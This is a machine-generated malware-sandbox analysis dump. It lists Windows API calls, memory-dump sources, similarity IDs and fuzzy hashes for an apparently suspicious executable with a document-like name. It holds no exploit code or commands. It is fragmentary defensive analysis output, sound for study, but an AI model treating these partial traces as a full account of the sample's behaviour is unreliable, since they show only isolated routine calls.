                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                              • String ID:
                                                                                                              • API String ID: 1941528284-0
                                                                                                              • Opcode ID: 7414090835c37b2da69ca23e027a58d56e44aace4796a00baa671bee27ff00f6
                                                                                                              • Instruction ID: dcaa159d3d65cf46b394741f05a2eb50de91680975dac2d9d0f3c2bd51607c2a
                                                                                                              • Opcode Fuzzy Hash: 7414090835c37b2da69ca23e027a58d56e44aace4796a00baa671bee27ff00f6
                                                                                                              • Instruction Fuzzy Hash: 2441C671904515BADF10BB69DC46EAF3568EF01368F20823BF121B10E1DA7C4A419A6D
                                                                                                              APIs
                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 333E715C
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 333E717F
                                                                                                                • Part of subcall function 333E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 333E5702
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 333E71A5
                                                                                                              • _free.LIBCMT ref: 333E71B8
                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 333E71C7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 336800556-0
                                                                                                              • Opcode ID: 5f7a7b923c13d7882d66459c5066d05448565fb10ffe1b1db560fb2453f5ac1e
                                                                                                              • Instruction ID: 246856552f7542b9da37654819fc79fabb2da61f6ce20fc161b4bd0d05502c24
                                                                                                              • Opcode Fuzzy Hash: 5f7a7b923c13d7882d66459c5066d05448565fb10ffe1b1db560fb2453f5ac1e
                                                                                                              • Instruction Fuzzy Hash: 2501ACBBA11335BFA7111EB65C8CD7B6A6DDFC39A1358812DBD04D7200DE758C0282B1
                                                                                                              APIs
                                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A60
                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9C
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402AA5
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402ACA
                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1912718029-0
                                                                                                              • Opcode ID: 4b25ae56376b3f1221da29a59a5e0d01808cbf612e92f5f00375b302b45f37be
                                                                                                              • Instruction ID: a214132de7a877a1f887ec7b259b79ce535b7ac4ce934fbe7a8c52476c4c5b6f
                                                                                                              • Opcode Fuzzy Hash: 4b25ae56376b3f1221da29a59a5e0d01808cbf612e92f5f00375b302b45f37be
                                                                                                              • Instruction Fuzzy Hash: A8116D71A00108BFDF219F90DE49EAB7B79EB54349F104176F906A00A0D7B49E51AF59
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000,333E636D,333E5713,00000000,?,333E2249,?,?,333E1D66,00000000,?,?,00000000), ref: 333E5B7F
                                                                                                              • _free.LIBCMT ref: 333E5BB4
                                                                                                              • _free.LIBCMT ref: 333E5BDB
                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E5BE8
                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E5BF1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3170660625-0
                                                                                                              • Opcode ID: 500f5002824ad591ebbb2567ab02a2e6abd6f9c03886a8bff95932e4597d66f3
                                                                                                              • Instruction ID: 0c2fea4cd49c50001cf6b8510dc17f10db4cf8cf8ca128c7e16acafca59bb5af
                                                                                                              • Opcode Fuzzy Hash: 500f5002824ad591ebbb2567ab02a2e6abd6f9c03886a8bff95932e4597d66f3
                                                                                                              • Instruction Fuzzy Hash: 9D01443B984723ABF2023E349CC0E1B2BAD8FC25B0358C024F816F6240EE68C8020124
APIs
• lstrlenW.KERNEL32(?,?,?,?,?,333E10DF,?,?,?,00000000), ref: 333E1E9A
• lstrcatW.KERNEL32(?,?,?,333E10DF,?,?,?,00000000), ref: 333E1EAC
• lstrlenW.KERNEL32(?,?,333E10DF,?,?,?,00000000), ref: 333E1EB3
• lstrlenW.KERNEL32(?,?,333E10DF,?,?,?,00000000), ref: 333E1EC8
• lstrcatW.KERNEL32(?,333E10DF,?,333E10DF,?,?,?,00000000), ref: 333E1ED3
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: lstrlen$lstrcat
• String ID:
• API String ID: 493641738-0
APIs
• _free.LIBCMT ref: 333E91D0
  • Part of subcall function 333E571E: HeapFree.KERNEL32(00000000,00000000,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?), ref: 333E5734
  • Part of subcall function 333E571E: GetLastError.KERNEL32(?,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?,?), ref: 333E5746
• _free.LIBCMT ref: 333E91E2
• _free.LIBCMT ref: 333E91F4
• _free.LIBCMT ref: 333E9206
• _free.LIBCMT ref: 333E9218
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetDlgItem.USER32(?), ref: 00401CD0
• GetClientRect.USER32(00000000,?), ref: 00401CDD
• LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
• SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
• DeleteObject.GDI32(00000000), ref: 00401D1B
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
APIs
• GetDC.USER32(?), ref: 00401D29
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
• MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
• ReleaseDC.USER32(?,00000000), ref: 00401D56
• CreateFontIndirectA.GDI32(0040A7B8), ref: 00401DA1
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID:
• API String ID: 3808545654-0
APIs
• _free.LIBCMT ref: 333E536F
  • Part of subcall function 333E571E: HeapFree.KERNEL32(00000000,00000000,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?), ref: 333E5734
  • Part of subcall function 333E571E: GetLastError.KERNEL32(?,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?,?), ref: 333E5746
• _free.LIBCMT ref: 333E5381
• _free.LIBCMT ref: 333E5394
• _free.LIBCMT ref: 333E53A5
• _free.LIBCMT ref: 333E53B6
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,00000104), ref: 333E4C1D
• _free.LIBCMT ref: 333E4CE8
• _free.LIBCMT ref: 333E4CF2
Strings
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
• API String ID: 2506810119-1533645698
APIs
• lstrlenA.KERNEL32(0041FCE0,0041FCE0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046D4,000000DF,0000040F,00000400,00000000), ref: 00404842
• wsprintfA.USER32 ref: 0040484A
• SetDlgItemTextA.USER32(?,0041FCE0), ref: 0040485D
Strings
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
APIs
• SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
• SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
Strings
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,333E6FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 333E8731
• MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 333E87BA
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 333E87CC
• __freea.LIBCMT ref: 333E87D5
  • Part of subcall function 333E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 333E5702
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
APIs
• GetTickCount.KERNEL32 ref: 00403051
  • Part of subcall function 004031CE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402EA6,?), ref: 004031DC
• SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00402F54,00000004,00000000,00000000,?,?,?,00402ECD,000000FF,00000000,00000000), ref: 00403084
• WriteFile.KERNEL32(0040A888,?,00000000,00000000,00412888,00004000,?,00000000,?,00402F54,00000004,00000000,00000000,?,?), ref: 0040313E
• SetFilePointer.KERNEL32(?,00000000,00000000,00412888,00004000,?,00000000,?,00402F54,00000004,00000000,00000000,?,?,?,00402ECD), ref: 00403190
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Pointer$CountTickWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 2146148272-0
                                                                                                              • Opcode ID: 21382e836d7c05a3e87e7c33a043faaf5ec86303859092ae4c974924d344ca23
                                                                                                              • Instruction ID: a35b4d635d582a079554899d3f3348b8a37966e1b02de07338691533ba46218a
                                                                                                              • Opcode Fuzzy Hash: 21382e836d7c05a3e87e7c33a043faaf5ec86303859092ae4c974924d344ca23
                                                                                                              • Instruction Fuzzy Hash: 8B41BF729042019FDB10AF29ED849663FFCE748356715823BE914BB2E0C7399E41DB5E
                                                                                                              APIs
                                                                                                              • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235C
                                                                                                              • lstrlenA.KERNEL32(00409BB0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237C
                                                                                                              • RegSetValueExA.ADVAPI32(?,?,?,?,00409BB0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B5
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00409BB0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402492
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1356686001-0
                                                                                                              • Opcode ID: 5d4bc013e145d610d8e4d3776898919e2ad1293bc549356cb0d91ef786ee7921
                                                                                                              • Instruction ID: 5b7358e468b3e7e805740e69444adcde94b22edecb5190afa3496e3dc7040632
                                                                                                              • Opcode Fuzzy Hash: 5d4bc013e145d610d8e4d3776898919e2ad1293bc549356cb0d91ef786ee7921
                                                                                                              • Instruction Fuzzy Hash: AD1181B1A00118BEEB10EBA4DE89EAF7678EB50358F10413AF905B61D1D6B85D01A628
                                                                                                              APIs
                                                                                                                • Part of subcall function 00405809: CharNextA.USER32(?,?,004210E8,?,00405875,004210E8,004210E8,0042A400,?,771B2EE0,004055C0,?,0042A400,771B2EE0,00000000), ref: 00405817
                                                                                                                • Part of subcall function 00405809: CharNextA.USER32(00000000), ref: 0040581C
                                                                                                                • Part of subcall function 00405809: CharNextA.USER32(00000000), ref: 00405830
                                                                                                              • CreateDirectoryA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                              • SetCurrentDirectoryA.KERNEL32(00000000,00429800,00000000,00000000,000000F0), ref: 00401622
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 3751793516-0
                                                                                                              • Opcode ID: a5e224c393a2dbf3682a9a167fecb91690cdd684f6bc615aac3eb61a4f6a471a
                                                                                                              • Instruction ID: a7fcd4b568d892c9356fe073e55a2dcd02e69eb8fb6dd9dcb191d2df0a387b75
                                                                                                              • Opcode Fuzzy Hash: a5e224c393a2dbf3682a9a167fecb91690cdd684f6bc615aac3eb61a4f6a471a
                                                                                                              • Instruction Fuzzy Hash: BB112532908150ABDB117FB51D4496F27B0EA52366728473FF491B22E2D23C0942D62E
                                                                                                              APIs
                                                                                                              • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                                                                                              • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                                                                              • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                                                                                • Part of subcall function 00405C3E: wsprintfA.USER32 ref: 00405C4B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 1404258612-0
                                                                                                              • Opcode ID: 19ad64cbfd362b12fd4dbc717af0eb9568492415a51530331d6a798985c52559
                                                                                                              • Instruction ID: 9c6242ade9da0ce9323d8482387ced81676d99406c202c21daae8146895b88d7
                                                                                                              • Opcode Fuzzy Hash: 19ad64cbfd362b12fd4dbc717af0eb9568492415a51530331d6a798985c52559
                                                                                                              • Instruction Fuzzy Hash: 1B115EB1900218BEDB11AFA5D941DEEBBB9EF04344B10807AF505F61A1E7389A55DB28
                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,333E1D66,00000000,00000000,?,333E5C88,333E1D66,00000000,00000000,00000000,?,333E5E85,00000006,FlsSetValue), ref: 333E5D13
                                                                                                              • GetLastError.KERNEL32(?,333E5C88,333E1D66,00000000,00000000,00000000,?,333E5E85,00000006,FlsSetValue,333EE190,FlsSetValue,00000000,00000364,?,333E5BC8), ref: 333E5D1F
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,333E5C88,333E1D66,00000000,00000000,00000000,?,333E5E85,00000006,FlsSetValue,333EE190,FlsSetValue,00000000), ref: 333E5D2D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 3177248105-0
                                                                                                              • Opcode ID: 05f8453a80f6c9bc20b4c2a6d4ad435f6c876a86479e8ecb39a1c575b192f875
                                                                                                              • Instruction ID: 4a8e72abf6b36bb9b823c77fb123839af7169b3f99ed9f85285484a0b5d1350c
                                                                                                              • Opcode Fuzzy Hash: 05f8453a80f6c9bc20b4c2a6d4ad435f6c876a86479e8ecb39a1c575b192f875
                                                                                                              • Instruction Fuzzy Hash: C3018837651332AFE7215EA8DC48A57779CAF067F2B548620F915E7140D724D806C7D0
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 333E655C
                                                                                                                • Part of subcall function 333E62BC: IsProcessorFeaturePresent.KERNEL32(00000017,333E62AB,00000000,?,?,?,?,00000016,?,?,333E62B8,00000000,00000000,00000000,00000000,00000000), ref: 333E62BE
                                                                                                                • Part of subcall function 333E62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 333E62E0
                                                                                                                • Part of subcall function 333E62BC: TerminateProcess.KERNEL32(00000000), ref: 333E62E7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                              • String ID: *?$.
                                                                                                              • API String ID: 2667617558-3972193922
                                                                                                              • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                              • Instruction ID: 656ff3db9911929d2e44226c3e9a435a8a8d28cc6d70de3c99f2b4254692f286
                                                                                                              • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                              • Instruction Fuzzy Hash: CE518177E80229AFDF04CFA8CC80AADBBF9EF48354F24C169D454E7744E6359A418B50
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _strlen
                                                                                                              • String ID: : $Se.
                                                                                                              • API String ID: 4218353326-4089948878
                                                                                                              • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                              • Instruction ID: 9008fcdc45a487803e7485d7b701eb4154c04c40d79199da11e79945d7b3a220
                                                                                                              • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                              • Instruction Fuzzy Hash: 4811E376E00358AEDB11CFA8D880BDEFBFCAF09604F14805AE545E7252E6745A42CB65
                                                                                                              APIs
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 333E2903
